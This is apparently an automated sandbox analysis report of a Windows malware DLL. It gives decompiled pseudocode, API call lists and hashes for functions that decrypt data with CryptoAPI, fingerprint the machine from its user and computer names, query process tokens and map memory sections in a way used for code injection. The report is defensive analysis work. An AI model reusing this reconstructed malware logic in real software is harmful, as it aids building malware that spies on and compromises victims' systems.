                    0x00000000
                    0x010c49ac
                    0x010c49bb
                    0x010c49c1
                    0x010c49c9
                    0x010c49c9
                    0x00000000
                    0x010c49aa
                    0x010c49ae
                    0x010c49b6
                    0x010c49b9
                    0x010c49d0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c49b9
                    0x010c4930
                    0x010c49e9
                    0x010c49ec
                    0x010c49ec
                    0x010c4a01
                    0x010c4a01
                    0x010c4a19

                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,010C3AC6), ref: 010C48AA
                    • memcpy.NTDLL(?,010C3AC6,00000010,?,?,?,?,?,?,?,?,?,?,010C60F5,00000000,010C4DD9), ref: 010C48C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 010C48EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 010C4904
                    • memcpy.NTDLL(00000000,010C4DD9,010C3AC6,0000011F), ref: 010C4956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,010C3AC6,00000020,?,?,0000011F), ref: 010C497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,010C3AC6,?,?,0000011F), ref: 010C4996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 010C49AE
                    • GetLastError.KERNEL32 ref: 010C49E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 010C49EC
                    • GetLastError.KERNEL32 ref: 010C49F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 010C4A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,010C60F5,00000000,010C4DD9,010C3AC6,?,010C3AC6), ref: 010C4A09
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: 5c5085b3e7ae0db0bdf4a95fe23cf157e2485f56fb3d965d8211769d4db886b1
                    • Instruction ID: dbed2b3732ce85c7f3b304632de5491c9fd3f5f9660d10293aeeae1492e331a0
                    • Opcode Fuzzy Hash: 5c5085b3e7ae0db0bdf4a95fe23cf157e2485f56fb3d965d8211769d4db886b1
                    • Instruction Fuzzy Hash: 60515971900218FFEB20DFA8D888AEEBBB8FB04754F104469F985E7240E7758A54DF21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001DCF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81filetimeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 10001dcf-10001e26 _aulldiv _snwprintf 233 10001e28 231->233 234 10001e2d-10001e46 231->234 233->234 236 10001e90-10001e96 GetLastError 234->236 237 10001e48-10001e51 234->237 240 10001e98-10001e9e 236->240 238 10001e61-10001e6f MapViewOfFile 237->238 239 10001e53-10001e5a GetLastError 237->239 242 10001e71-10001e7d 238->242 243 10001e7f-10001e85 GetLastError 238->243 239->238 241 10001e5c-10001e5f 239->241 244 10001e87-10001e8e CloseHandle 241->244 242->240 243->240 243->244 244->240
                    C-Code - Quality: 69%
                    			E10001DCF(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L100021F0();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x100041d0;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L100021EA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x100041c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                    0x10001dcf
                    0x10001dd8
                    0x10001ddc
                    0x10001de2
                    0x10001de7
                    0x10001dec
                    0x10001def
                    0x10001df2
                    0x10001df7
                    0x10001df8
                    0x10001dfb
                    0x10001e06
                    0x10001e0d
                    0x10001e11
                    0x10001e13
                    0x10001e14
                    0x10001e17
                    0x10001e1c
                    0x10001e26
                    0x10001e28
                    0x10001e28
                    0x10001e3c
                    0x10001e42
                    0x10001e46
                    0x10001e96
                    0x10001e48
                    0x10001e51
                    0x10001e67
                    0x10001e6f
                    0x10001e81
                    0x10001e85
                    0x00000000
                    0x00000000
                    0x10001e71
                    0x10001e74
                    0x10001e79
                    0x10001e7b
                    0x10001e7b
                    0x10001e5c
                    0x10001e5e
                    0x10001e87
                    0x10001e88
                    0x10001e88
                    0x10001e51
                    0x10001e9e

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?,?), ref: 10001DDC
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001DF2
                    • _snwprintf.NTDLL ref: 10001E17
                    • CreateFileMappingW.KERNELBASE(000000FF,100041C0,00000004,00000000,?,?), ref: 10001E3C
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?), ref: 10001E53
                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001E67
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?), ref: 10001E7F
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A), ref: 10001E88
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?), ref: 10001E90
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID: At`Rt
                    • API String ID: 1724014008-4257177166
                    • Opcode ID: fe8e0312be3bd5815d8acad5171ae4a4159edb195e2773d4f5fb25bbf3a3f938
                    • Instruction ID: 146729f2bc210c63e1e77147fa2b15d87e0528f2de9ba26f60d27e9d9c38c8a0
                    • Opcode Fuzzy Hash: fe8e0312be3bd5815d8acad5171ae4a4159edb195e2773d4f5fb25bbf3a3f938
                    • Instruction Fuzzy Hash: 53217CB2900158AFFB11EFA8CCC4EEF77ADEB583D0F118025FA15D71A8DA3099418B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C21BC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 245 10c21bc-10c21d0 246 10c21da-10c21ec call 10c5894 245->246 247 10c21d2-10c21d7 245->247 250 10c21ee-10c21fe GetUserNameW 246->250 251 10c2240-10c224d 246->251 247->246 252 10c224f-10c2266 GetComputerNameW 250->252 253 10c2200-10c2210 RtlAllocateHeap 250->253 251->252 254 10c2268-10c2279 RtlAllocateHeap 252->254 255 10c22a4-10c22c6 252->255 253->252 256 10c2212-10c221f GetUserNameW 253->256 254->255 257 10c227b-10c2284 GetComputerNameW 254->257 258 10c222f-10c223e 256->258 259 10c2221-10c222d call 10c52a9 256->259 261 10c2295-10c2298 257->261 262 10c2286-10c2292 call 10c52a9 257->262 258->252 259->258 261->255 262->261
                    C-Code - Quality: 96%
                    			E010C21BC(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x10ca310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E010C5894( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x10ca31c ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x10ca2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E010C52A9(_v8 + _v8, _t63);
							}
							HeapFree( *0x10ca2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x10ca2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E010C52A9(_v8 + _v8, _t63);
						}
						HeapFree( *0x10ca2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                    0x010c21bc
                    0x010c21c4
                    0x010c21ca
                    0x010c21cd
                    0x010c21d0
                    0x010c21d2
                    0x010c21d7
                    0x010c21d7
                    0x010c21dd
                    0x010c21df
                    0x010c21ec
                    0x010c224d
                    0x010c21ee
                    0x010c21f3
                    0x010c21f9
                    0x010c21fe
                    0x010c220c
                    0x010c2210
                    0x010c221f
                    0x010c2226
                    0x010c222d
                    0x010c222d
                    0x010c2238
                    0x010c2238
                    0x010c2210
                    0x010c21fe
                    0x010c224f
                    0x010c2255
                    0x010c225f
                    0x010c2261
                    0x010c2266
                    0x010c2275
                    0x010c2279
                    0x010c2284
                    0x010c228b
                    0x010c2292
                    0x010c2292
                    0x010c229e
                    0x010c229e
                    0x010c2279
                    0x010c22a7
                    0x010c22a9
                    0x010c22ac
                    0x010c22ae
                    0x010c22b1
                    0x010c22b4
                    0x010c22be
                    0x010c22c2
                    0x010c22c6

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C21F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 010C220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C2217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C2238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 010C225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 010C2273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 010C2280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: f3cd61cb9e644d3e1a6a4bb2bbe23fc03465ec821e2d5c8fa4bee855c4eac702
                    • Instruction ID: e0948c21e248b6890b15fd5b40adbaf5b5bda7edb1dbcbba3e61b5298751a393
                    • Opcode Fuzzy Hash: f3cd61cb9e644d3e1a6a4bb2bbe23fc03465ec821e2d5c8fa4bee855c4eac702
                    • Instruction Fuzzy Hash: FD313C71A00209EFDB21DFA9DC80A6EBBFAFB48710F204069E585D3214E735E9409F10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001077 Relevance: 13.6, APIs: 9, Instructions: 120sleepnativesynchronizationCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 83%
                    			E10001077(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E1000169C();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E100011B5(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E1000164B(_t57);
						}
					} while (_v8 != 0);
					_t27 = E10001508(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E1000193D(E10001EA8,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E10001351(_t53,  &_a4) != 0) {
					 *0x100041b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x100041b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E100011B5(_t60 + _t19);
				 *0x100041b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E1000164B(_t52);
				goto L18;
			}
























                    0x1000107d
                    0x10001084
                    0x10001087
                    0x100011b2
                    0x100011b2
                    0x10001090
                    0x10001090
                    0x10001094
                    0x10001097
                    0x10001098
                    0x1000109e
                    0x100010a2
                    0x100010d9
                    0x100010a4
                    0x100010ac
                    0x100010b2
                    0x100010b4
                    0x100010bc
                    0x100010bf
                    0x100010c1
                    0x100010c1
                    0x100010c8
                    0x100010ce
                    0x100010ce
                    0x100010d2
                    0x100010d2
                    0x100010e0
                    0x100010e7
                    0x100010f0
                    0x100010f3
                    0x100010f9
                    0x100010fc
                    0x10001105
                    0x100011ae
                    0x00000000
                    0x100011b0
                    0x1000110e
                    0x1000115f
                    0x1000115f
                    0x10001175
                    0x10001179
                    0x100011a1
                    0x1000117b
                    0x1000117e
                    0x10001186
                    0x10001189
                    0x10001190
                    0x10001190
                    0x10001197
                    0x10001197
                    0x100011a4
                    0x100011aa
                    0x100011ac
                    0x100011ac
                    0x00000000
                    0x100011aa
                    0x1000111b
                    0x10001159
                    0x00000000
                    0x10001159
                    0x1000111d
                    0x10001122
                    0x10001129
                    0x1000112b
                    0x1000112f
                    0x10001151
                    0x10001151
                    0x00000000
                    0x10001151
                    0x10001131
                    0x10001136
                    0x1000113d
                    0x10001142
                    0x00000000
                    0x00000000
                    0x10001147
                    0x1000114a
                    0x00000000

                    APIs
                      • Part of subcall function 1000169C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001082), ref: 100016AB
                      • Part of subcall function 1000169C: GetVersion.KERNEL32 ref: 100016BA
                      • Part of subcall function 1000169C: GetCurrentProcessId.KERNEL32 ref: 100016D1
                      • Part of subcall function 1000169C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100016EA
                      • Part of subcall function 100011B5: HeapAlloc.KERNEL32(00000000,?,1000109E,00000030,74E063F0,00000000), ref: 100011C1
                    • NtQuerySystemInformation.NTDLL ref: 100010AC
                    • Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 100010F3
                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001129
                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001147
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,10001EA8,?,00000000), ref: 1000117E
                    • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001190
                    • CloseHandle.KERNEL32(00000000), ref: 10001197
                    • GetLastError.KERNEL32(10001EA8,?,00000000), ref: 1000119F
                    • GetLastError.KERNEL32 ref: 100011AC
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                    • String ID:
                    • API String ID: 3479304935-0
                    • Opcode ID: 4013a9184cb7c1bc6bee1f3c097bfa70eb0927f871e735c9adcd4eb2677f4e65
                    • Instruction ID: 136ff7606eb524f18d1a387e18ea9bd855513c6b7b8d73c4c634e1d572feb9be
                    • Opcode Fuzzy Hash: 4013a9184cb7c1bc6bee1f3c097bfa70eb0927f871e735c9adcd4eb2677f4e65
                    • Instruction Fuzzy Hash: 90319C7590162AEBF711DBA58C94ADF7BEDEF446D0F214126FA04E3248DB30DA408BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C77BB Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E010C77BB(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E010C63FD(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E010C17AB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                    0x010c77c8
                    0x010c77c9
                    0x010c77ca
                    0x010c77cb
                    0x010c77cc
                    0x010c77d0
                    0x010c77d7
                    0x010c77e6
                    0x010c77e9
                    0x010c77ec
                    0x010c77f3
                    0x010c77f6
                    0x010c77f9
                    0x010c77fc
                    0x010c77ff
                    0x010c780a
                    0x010c780c
                    0x010c7815
                    0x010c781d
                    0x010c781f
                    0x010c7831
                    0x010c783b
                    0x010c783f
                    0x010c784e
                    0x010c7852
                    0x010c785b
                    0x010c7863
                    0x010c7863
                    0x010c7865
                    0x010c7865
                    0x010c786d
                    0x010c7873
                    0x010c7877
                    0x010c7877
                    0x010c7882

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 010C7802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 010C7815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010C7831
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010C784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 010C785B
                    • NtClose.NTDLL(?), ref: 010C786D
                    • NtClose.NTDLL(00000000), ref: 010C7877
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: c4ce68e5dbc8a8b46a950838ec2ab9b20aa51883ba8e90bc80d3536633a69d72
                    • Instruction ID: b7860afa87758f42108c0c498e9be6e2d42f9c0c64d743ff2be0e014f33954c9
                    • Opcode Fuzzy Hash: c4ce68e5dbc8a8b46a950838ec2ab9b20aa51883ba8e90bc80d3536633a69d72
                    • Instruction Fuzzy Hash: 942103B2900219BFDB119F95CC85ADEBFBDEF08B40F10406AFA45A6210D7728A44DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001F61 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E10001F61(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E100012BE(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                    0x10001f6a
                    0x10001f71
                    0x10001f72
                    0x10001f73
                    0x10001f74
                    0x10001f75
                    0x10001f86
                    0x10001f8a
                    0x10001f9e
                    0x10001fa1
                    0x10001fa4
                    0x10001fab
                    0x10001fae
                    0x10001fb5
                    0x10001fb8
                    0x10001fbb
                    0x10001fbe
                    0x10001fc3
                    0x10001ffe
                    0x10001fc5
                    0x10001fc8
                    0x10001fce
                    0x10001fd3
                    0x10001fd7
                    0x10001ff5
                    0x10001fd9
                    0x10001fe0
                    0x10001fee
                    0x10001fee
                    0x10001fd7
                    0x10002006

                    APIs
                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 10001FBE
                      • Part of subcall function 100012BE: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001FD3,00000002,00000000,?,?,00000000,?,?,10001FD3,00000002), ref: 100012EB
                    • memset.NTDLL ref: 10001FE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: Section$CreateViewmemset
                    • String ID: @
                    • API String ID: 2533685722-2766056989
                    • Opcode ID: 97125f7fc7b543a1a6761c50e715df49521db9375fc44024afda9e762102f593
                    • Instruction ID: 7011bbd483f2ac9fc56361f1e6937c6e52c657097d993af70c3397b369731c67
                    • Opcode Fuzzy Hash: 97125f7fc7b543a1a6761c50e715df49521db9375fc44024afda9e762102f593
                    • Instruction Fuzzy Hash: 5F2108B6D00209AFDB11CFA9C884ADEFBB9EF48354F108429E615F3210D730AA458BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100012BE Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E100012BE(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                    0x100012d0
                    0x100012d6
                    0x100012e4
                    0x100012eb
                    0x100012f0
                    0x100012f6
                    0x00000000
                    0x100012f7
                    0x00000000

                    APIs
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001FD3,00000002,00000000,?,?,00000000,?,?,10001FD3,00000002), ref: 100012EB
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: SectionView
                    • String ID:
                    • API String ID: 1323581903-0
                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction ID: aefe625517b6fb83a219c38b084ca840f45519f0753eeb6c84f01f9ec1e36c5b
                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                    • Instruction Fuzzy Hash: 23F01CB690420CBFEB119FA5CC85C9FBBBDEB48294F104939B552E2094D6309E199A60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C68EB Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E010C68EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
